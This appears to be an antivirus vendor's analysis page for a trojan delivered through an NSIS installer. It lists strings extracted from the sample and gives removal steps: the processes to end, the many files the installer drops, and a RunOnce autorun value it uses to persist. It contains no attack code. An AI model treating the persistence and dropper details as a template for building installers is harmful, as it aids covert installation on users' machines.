C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv14.tmp
dlgen.php?r=vu_vo2_
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.0.0.1

nsg16.tmp_1164:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
h.hTZ
,T.UV
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%Program Files%
\System.dll
\nsExec.dll
\INetC.dll
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsg16.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx1A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nsoA.tmp:240
    Full_Setup.exe:1912
    %original file name%.exe:856
    nsg16.tmp:1164

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\vos_n[1].htm (977 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoF.tmp (11755 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv14.tmp (977 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (6720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\t1.dll (4 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\r[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\IpConfig.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\r[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\CAW1QV4X.htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (43 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (9120 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
